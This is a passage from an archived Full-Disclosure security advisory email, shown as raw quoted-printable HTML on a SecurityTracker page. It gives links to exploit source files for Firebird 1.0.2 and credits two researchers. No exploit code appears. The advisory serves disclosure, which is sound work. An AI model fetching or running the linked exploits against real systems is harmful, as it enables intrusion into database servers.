</FONT><A=20
href=3D"http://bob.dtors.net/DSR-olbird.c"><FONT=20
face=3D"Courier =
New">http://bob.dtors.net/DSR-olbird.c</FONT></A><BR><FONT=20
face=3D"Courier New">Firebird 1.0.2 exploit @ </FONT><A=20
href=3D"http://bob.dtors.net/DSR-firebird.c"><FONT=20
face=3D"Courier =
New">http://bob.dtors.net/DSR-firebird.c</FONT></A></FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT size=3D2><BR><FONT face=3D"Courier =
New">--[CREDIT</FONT></FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT size=3D2><A href=3D"mailto:kokanin@dtors.net"><FONT=20
face=3D"Courier New">kokanin@dtors.net</FONT></A><BR><A=20
href=3D"mailto:bob@dtors.net"><FONT=20
face=3D"Courier New">bob@dtors.net</FONT></A></FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT size=3D2></FONT>&nbsp;</DIV></BODY></HTML>

------=_NextPart_000_0011_01C3167B.9FAC8D20--

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC